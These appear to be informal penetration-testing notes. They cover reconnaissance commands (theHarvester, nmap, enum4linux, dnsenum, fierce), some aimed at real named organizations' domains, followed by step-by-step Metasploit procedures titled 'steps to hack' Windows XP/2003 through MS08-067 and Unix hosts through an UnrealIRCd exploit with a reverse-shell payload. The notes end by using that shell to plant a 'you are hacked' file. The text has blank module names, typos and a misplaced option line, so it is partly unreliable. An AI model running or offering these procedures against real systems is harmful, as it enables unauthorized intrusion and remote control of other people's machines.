theharvester – A tool for gathering e-mail accounts and subdomain names from public sources ( ex: nttdata.com )
Usage: theharvester options
-d: Domain to search or company name
-b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
-s: Start in result number X (default 0)
-v: Verify host name via dns resolution and search for virtual hosts
-f: Save the results into an HTML and XML file
-n: Perform a DNS reverse query on all ranges discovered
-c: Perform a DNS brute force for the domain name
-t: Perform a DNS TLD expansion discovery
-e: Use this DNS server
-l: Limit the number of results to work with(bing goes from 50 to 50 results,
-h: use SHODAN database to query discovered hosts
google 100 to 100, and pgp doesn't use this option)
Examples: theharvester -d microsoft.com -l 500 -b google
theharvester -d microsoft.com -b pgp
theharvester -d microsoft -l 200 -b linkedin
1) Network Scan
2) Port scan
3) Vulnarability scan
1) NETWORKING SCAN:
i)AngryIP scanner
ii)Network scanning with nmap
inbuilt tool in kali:
#nmap -sn 192.168.0.1-255
iii)fping:
#fping -g 192.168.0.1/24
#fping -C 1 192.168.0.1
iv)Netdiscover:
#netdiscover -r 192.168.0.1/24
2) PORTS SCAN:
List of TCP Communication flags:
1) SYN
2)ACK
3)RST
4)FIN
5)PSH
6)URG
1) Stealth Scan;
#nmap -sS 192.168.0.112
#rdesktop 192.168.0.112
#nmap -sS eenadu.net
3) TCP connect scan:
#nmap -sT 192.168.0.112
Software version detection scan;
nmap -sV 192.168.0.112
OS detection scan;
#nmap -O 192.168.0.112
#nmap -sF 192.168.0.112
#nmap -sX 192.168.0.112
Enumeration:
#nmap -A 192.168.0.112
#enum4linux -U 192.168.0.151 //to get all users
#enum4linux -M 192.168.0.151 //to get machine list
#enum4linux -S 192.168.0.151 //to get shared folder details
#enum4linux -P 192.168.0.151 //to get password policy
DNS :
#dnsenum gmail.com
#dnsrecon -t srv
#dnsrecon -t srv -d nttdata.com
#fierce -dns icicibank.com
Metsploit framework:
1)msf console
2)msfvenom
msf console contains:
1)exploits
2)payloads
3)post
4)auxiliary
5)encoders
6)nops
msfvenom contains:
1)payloads
2)encoders
3)nops
Metasploit framework:
steps to hack windows xp, windows server 2003 with ms0.8_067 vulnarability.
step 1: MSF console open
step 2: show exploits
step 3: use
step 4: show options
step 5: set RHOST
once configure the port then we need to get the control with the help of payloads.
step 6: set payload
step 7: show options
step 8: set LHOST
step 9: set LPORT 1161 (we can use any port number here from 0-65535 except port no 442)
step 10: show options
step 11: exploit
steps to hack windows xp, windows server 2003 with vnc inject payload
step 1: MSF console open
step 2: show exploits ( we can use search option to get the direct exploit name here: #search ms08_067_netapi)
step 3: use
step 4: show options
once configure the port then we need to get the control with the help of payloads.
step 5: set payload
step 6: show options
step 7: set RHOST
step 8: set LHOST
step 9: set LPORT 1161 (we can use any port number here from 0-65535 except port no 442)
step 10: show options
step 11: exploit
steps to hack windows xp, server 2003 with meterpreter payload
step 1: MSF console open
step 2: show exploits ( we can use search option to get the direct exploit name here: #search ms08_067_netapi)
step 3: use
step 4: show payloads
once configure the port then we need to get the control with the help of payloads.
step 5: set payload
step 6: show options
step 7: set RHOST
step 8: set LHOST
step 9: set LPORT 1161 (we can use any port number here from 0-65535 except port no 442)
step 10: show options
step 11: exploit
metasploit commands:
steps to hack unix and linux os with help of irc port 6667 where unreal irc software is listening
step 1: MSF console open
step 2: show exploits ( we can use search option to get the direct exploit name here: #search unrealirc )
step 3: use
step 4: show options
step 5: set RHOST
step 6: show payloads
step 7: set payload cmd/unix/revers
step 8: show options
step 9: set LHOST
step 10: set LPORT 1161
step 11: ls -l -a
# pwd
# echo "you are hacked...."> ravi.txt
txt file will be created
for confirmation > ls
# cat ravi.txt ( to open a txt file )
